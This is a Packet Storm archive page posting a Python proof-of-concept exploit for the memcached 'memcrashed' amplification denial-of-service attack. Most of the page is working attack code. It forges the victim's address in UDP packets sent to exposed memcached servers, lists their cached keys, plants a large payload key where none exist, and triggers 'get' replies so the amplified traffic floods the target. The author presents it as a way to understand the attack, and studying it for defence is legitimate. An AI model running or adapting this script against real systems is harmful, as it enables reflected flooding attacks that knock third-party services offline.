exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Memcached memcrashed Denial Of Service

Memcached memcrashed Denial Of Service
Posted Mar 6, 2018
Authored by Alex Conrey

This is a proof of concept exploit for the memcached denial of service vulnerability.

tags | exploit, denial of service, proof of concept
SHA-256 | e236ca49ed546c12ddb112111227312a5a52d87e88bf7ea165c9c3f5f8064cc2

Memcached memcrashed Denial Of Service

Change Mirror Download
# Written by Alex Conrey
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.

# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.

# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# This was created to better understand the memcrashed exploit
# brought to light thanks to CloudFlare.
# (https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/)
#
# Please sysadmin responsibly.

import requests
import memcache
import re

from scapy.all import *

# Vulnerable memcached server list
SERVER_LIST = [
'172.17.0.2:11211',
]

# Destination
TARGET = '1.2.3.4'

# optional payload to set if no keys exist
payload = requests.get('https://google.com').text
payload_key = 'fuckit'

# this forces payload to load into memory for being extra-evil and efficient
if not payload:
print 'Could not import payload, continuing anyway'

try:
for server in SERVER_LIST:
if ':' in server:
server = server.split(':')[0]

ip = IP(src=TARGET, dst=server)
packet_base = '\x00\x00\x00\x00\x00\x01\x00\x00{0}\r\n'

# fetch known keys by id
statitems_packet = packet_base.format('stats items')
udp = UDP(sport=50000, dport=11211)/statitems_packet
keyids = []
resp = sr1(ip/udp)
for key in str(resp.payload).split('\r\n'):
# Skip first line which has hex in it (I'm lazy)
if 'age' in key:
key = key.split(':')[1]
keyids.append(key)

# fetch names for keys by id
keys = []
for kid in keyids:
query = 'stats cachedump {0} 100'.format(kid)
keyid_packet = packet_base.format(query)
udp = UDP(sport=50000, dport=11211)/keyid_packet
resp = str(sr1(ip/udp).payload).split('\r\n')
for key in resp:
if 'ITEM' in key:
res = re.match(r"(.*)ITEM (?P<keyname>\w+)(.*)",key)
keys.append(res.group('keyname'))

# if keys not present on target, make one
if not keys:
mc = memcache.Client([server],debug=False)
mc.set(payload_key, payload)
keys.append(payload_key)

# iterate thru known keys and blast away
for key in keys:
query = 'get {0}'.format(key)
fun_packet = packet_base.format(query)
udp = UDP(sport=50000, dport=11211)/fun_packet
sr1(ip/udp)

except Exception:
raise

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close